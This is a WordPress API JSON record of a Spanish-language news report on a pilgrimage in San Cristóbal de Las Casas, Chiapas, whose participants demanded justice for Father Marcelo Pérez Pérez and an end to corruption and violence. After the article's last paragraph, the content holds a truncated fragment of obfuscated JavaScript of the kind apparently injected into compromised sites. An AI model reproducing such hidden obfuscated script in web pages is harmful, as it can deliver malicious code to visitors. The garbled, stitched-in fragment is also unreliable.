{"id":20048,"date":"2025-01-27T05:38:37","date_gmt":"2025-01-27T05:38:37","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20048"},"modified":"2025-01-27T05:38:37","modified_gmt":"2025-01-27T05:38:37","slug":"peregrinacion-por-la-paz-y-la-justicia-pude-justicia-para-el-padre-marcelo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20048","title":{"rendered":"Peregrinaci\u00f3n por la paz y la justicia pude justicia para el Padre Marcelo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"480\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/e7f21aee-db54-4ce7-b651-62860c4baf67.jpeg\" alt=\"\" class=\"wp-image-20049\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/e7f21aee-db54-4ce7-b651-62860c4baf67.jpeg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/01\/e7f21aee-db54-4ce7-b651-62860c4baf67-300x200.jpeg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<\/p>\n\n\n\n<p>26 de enero del 2025. San Crist\u00f3bal de Las Casas.- M\u00e1s de 4 mil 500 personas del Pueblo Creyente, provenientes de distintas parroquias de la Di\u00f3cesis de San Crist\u00f3bal de Las Casas, participaron este fin de semana en la peregrinaci\u00f3n de clausura del A\u00f1o Jubilar &#8220;jTatik Samuel, caminante en el coraz\u00f3n de los pueblos, memorias y horizontes&#8221; .<\/p>\n\n\n\n<p>Los contingentes partieron desde dos puntos estrat\u00e9gicos: el estacionamiento de Soriana y la carretera Panamericana, a la altura del crucero del Conalep. A lo largo de su recorrido por las principales calles de la ciudad, los fieles expresaron su compromiso con la justicia social y la paz, concluyendo en el centro hist\u00f3rico con una eucarist\u00eda celebrada junto a la Catedral.<\/p>\n\n\n\n<p>Durante la caminata, los participantes alzaron la voz con consignas como &#8220;Basta de corrupci\u00f3n&#8221;, &#8220;Basta de tanta impunidad&#8221;, &#8220;La iglesia callada jam\u00e1s ser\u00e1 escuchada&#8221; y &#8220;Alto al crimen organizado&#8221;. Tambi\u00e9n exigieron justicia para el padre Marcelo P\u00e9rez P\u00e9rez, castigo para los responsables de actos il\u00edcitos, y la liberaci\u00f3n de defensores de derechos humanos detenidos injustamente.<\/p>\n\n\n\n<p>La peregrinaci\u00f3n se enmarca en un contexto de crisis de inseguridad y violencia que afecta tanto a la di\u00f3cesis como a todo el estado de Chiapas.<\/p>\n\n\n\n<p>En este evento de fe y resistencia estuvieron presentes el Nuncio Apost\u00f3lico en M\u00e9xico, Mons. Joseph Spiteri, y los obispos de la di\u00f3cesis, Mons. Rodrigo Aguilar Mart\u00ednez y Mons. Luis Manuel L\u00f3pez Alfaro, as\u00ed como representantes de la Vicar\u00eda de Paz y Justicia y el Centro Minerva Bello.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal 26 de enero del 2025. San Crist\u00f3bal de Las Casas.- M\u00e1s de 4 mil 500 personas del Pueblo Creyente, provenientes de distintas parroquias de la Di\u00f3cesis de San Crist\u00f3bal de Las Casas, participaron este fin de semana en la peregrinaci\u00f3n de clausura del A\u00f1o Jubilar &#8220;jTatik Samuel, caminante en el coraz\u00f3n de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20049,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-20048","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20048","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20048"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20048\/revisions"}],"predecessor-version":[{"id":20050,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20048\/revisions\/20050"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20049"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20048"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20048"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20048"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}